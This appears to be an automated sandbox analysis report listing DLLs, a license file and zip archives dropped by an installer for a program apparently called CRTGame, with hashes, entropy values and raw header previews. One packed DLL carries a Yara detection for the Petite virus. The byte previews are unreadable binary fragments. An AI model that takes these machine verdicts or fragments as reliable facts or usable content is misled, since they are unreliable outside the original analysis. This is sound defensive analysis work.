                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):62478
                                                                                                          Entropy (8bit):6.063363187934607
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                                                          MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                                                          SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                                                          SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                                                          SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):112640
                                                                                                          Entropy (8bit):6.540227486061059
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                                          MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                                          SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                                          SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                                          SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                                          Malicious:false
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):845312
                                                                                                          Entropy (8bit):6.581151900686739
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                                                          MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                                                          SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                                                          SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                                                          SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):214016
                                                                                                          Entropy (8bit):6.676457645865373
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:v3UEEkp2yVTcc295GSSazZq0/OlxAOxN5jZ2Ti30ezAg0Fu9RBhk1Xion:cEEpYcc2G/adqLtxLZ2+vAO9Hhkzn
                                                                                                          MD5:2C747F19BF1295EBBDAB9FB14BB19EE2
                                                                                                          SHA1:6F3B71826C51C739D6BB75085E634B2B2EF538BC
                                                                                                          SHA-256:D2074B91A63219CFD3313C850B2833CD579CC869EF751B1F5AD7EDFB77BD1EDD
                                                                                                          SHA-512:C100C0A5AF52D951F3905884E9B9D0EC1A0D0AEBE70550A646BA6E5D33583247F67CA19E1D045170A286D92EE84E1676A6C1B0527E017A35B6242DD9DEE05AF4
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}6,.9WB.9WB.9WB...9.:WB.9WC.hWB....;WB."..&WB."..WB."...WB.9WB.?WB."..8WB."..8WB."..8WB.Rich9WB.........PE..L......W...........!.....N...........n.......`............................................@.........................`...h.......(....`..X....................p.......................................................`...............................text...?L.......N.................. ..`.rdata......`.......R..............@..@.data....W.......2..................@....rsrc...X....`......................@..@.reloc..f&...p...(..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):68876
                                                                                                          Entropy (8bit):7.922125376804506
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                                                          MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                                                          SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                                                          SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                                                          SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-P0GV3.tmp, Author: Joe Security
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/*.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c.*.=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):852754
                                                                                                          Entropy (8bit):6.503318968423685
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:fpFFQV+FKJ37Dm+yY4pBkPr2v2meLaoHN/oBrZ3ixdnGVzpJXm/iN:fpnzFw37iDYIBkzuPcHNgrZ3uGVzm/iN
                                                                                                          MD5:07FB6D31F37FB1B4164BEF301306C288
                                                                                                          SHA1:4CB41AF6D63A07324EF6B18B1A1F43CE94E25626
                                                                                                          SHA-256:06DDF0A370AF00D994824605A8E1307BA138F89B2D864539F0D19E8804EDAC02
                                                                                                          SHA-512:CAB4A7C5805B80851ABA5F2C9B001FABC1416F6648D891F49EACC81FE79287C5BAA01306A42298DA722750B812A4EA85388FFAE9200DCF656DD1D5B5B9323353
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..Y.,..v......!......... .....................a................................O}........ ......................................@.......................P..X0...........................0.......................................................text...............................`.P`.data...............................@.`..rdata..............................@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,.... ......................@.0..tls.... ....0......................@.0..rsrc........@......................@.0..reloc..X0...P...2..................@.0B/4...................&..............@.@B/19.................*..............@..B/31..........@......................@..B/45..........`......................@..B/57.................................@.0B/70.....i...............
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):26526
                                                                                                          Entropy (8bit):4.600837395607617
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Lc56OuAbnn0UReX6wFDVxnFw7xqsvzt+z/k8E9HinIhFkspcM9bc7ups0CZuQG:Lc5trLeDnFMz1ReScmc7GshZuQG
                                                                                                          MD5:BD7A443320AF8C812E4C18D1B79DF004
                                                                                                          SHA1:37D2F1D62FEC4DA0CAF06E5DA21AFC3521B597AA
                                                                                                          SHA-256:B634AB5640E258563C536E658CAD87080553DF6F34F62269A21D554844E58BFE
                                                                                                          SHA-512:21AEF7129B5B70E3F9255B1EA4DC994BF48B8A7F42CD90748D71465738D934891BBEC6C6FC6A1CCFAF7D3F35496677D62E2AF346D5E8266F6A51AE21A65C4460
                                                                                                          Malicious:false
                                                                                                          Preview: GNU LESSER GENERAL PUBLIC LICENSE. Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.].. Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15374
                                                                                                          Entropy (8bit):5.192037544202194
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                                          MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                                          SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                                          SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                                          SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):294926
                                                                                                          Entropy (8bit):6.191604766067493
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                                          MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                                          SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                                          SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                                          SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):967168
                                                                                                          Entropy (8bit):6.500850562754145
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                                          MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                                          SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                                          SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                                          SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                          Category:dropped
                                                                                                          Size (bytes):506871
                                                                                                          Entropy (8bit):7.998074018431883
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                                                          MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                                                          SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                                                          SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                                                          SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                                                          Malicious:false
                                                                                                          Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                          Category:dropped
                                                                                                          Size (bytes):506871
                                                                                                          Entropy (8bit):7.998074018431883
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                                                          MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                                                          SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                                                          SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                                                          SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                                                          Malicious:false
                                                                                                          Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):512014
                                                                                                          Entropy (8bit):6.566561154468342
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                                                          MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                                                          SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                                                          SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                                                          SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):126478
                                                                                                          Entropy (8bit):6.268811819718352
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                                                          MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                                                          SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                                                          SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                                                          SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):845312
                                                                                                          Entropy (8bit):6.581151900686739
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                                                          MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                                                          SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                                                          SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                                                          SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):648384
                                                                                                          Entropy (8bit):6.666474522542094
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
                                                                                                          MD5:CE7DE939D74321A7D0E9BDF534B89AB9
                                                                                                          SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
                                                                                                          SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
                                                                                                          SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):227328
                                                                                                          Entropy (8bit):6.641153481093122
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:jtJXnqDMJgH50aKyumLCGTrS4ifbjoO88k:KqgHlKyumLCGTrS4inoZ
                                                                                                          MD5:BC824DC1D1417DE0A0E47A30A51428FD
                                                                                                          SHA1:C909C48C625488508026C57D1ED75A4AE6A7F9DB
                                                                                                          SHA-256:A87AA800F996902F06C735EA44F4F1E47F03274FE714A193C9E13C5D47230FAB
                                                                                                          SHA-512:566B5D5DDEA920A31E0FB9E048E28EF2AC149EF075DB44542A46671380F904427AC9A6F59FBC09FE3A4FBB2994F3CAEEE65452FE55804E403CEABC091FFAF670
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...e>.a...........#.........t...V.................e.........................@......1......... .........................#....................................0...............................).......................................................text...............................`.P`.data...............................@.`..rdata..d0.......2..................@.`@.eh_framd@...@...B..................@.0@.bss.....T............................`..edata..#............T..............@.0@.idata...............^..............@.0..CRT....,............d..............@.0..tls......... .......f..............@.0..reloc.......0.......h..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):867854
                                                                                                          Entropy (8bit):4.9264497464202694
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
                                                                                                          MD5:B476CA59D61F11B7C0707A5CF3FE6E89
                                                                                                          SHA1:1A1E7C291F963C12C9B46E8ED692104C51389E69
                                                                                                          SHA-256:AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
                                                                                                          SHA-512:D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
                                                                                                          Malicious:false
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p................................*..........................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc...*.......,..................@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):394752
                                                                                                          Entropy (8bit):6.662070316214798
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:uAlmRfeS+mOxv8bgDTuXU54l8WybBE36IpuIT9nxQPQnhH/a0CRdWqWJwGKp:zlm0S+SEuXU54NylJIJ9KPQnhilRsVJ
                                                                                                          MD5:A4123DE65270C91849FFEB8515A864C4
                                                                                                          SHA1:93971C6BB25F3F4D54D4DF6C0C002199A2F84525
                                                                                                          SHA-256:43A9928D6604BF604E43C2E1BAB30AE1654B3C26E66475F9488A95D89A4E6113
                                                                                                          SHA-512:D0834F7DB31ABA8AA9D97479938DA2D4CD945F76DC2203D60D24C75D29D36E635C2B0D97425027C4DEBA558B8A41A77E288F73263FA9ABC12C54E93510E3D384
                                                                                                          Malicious:false
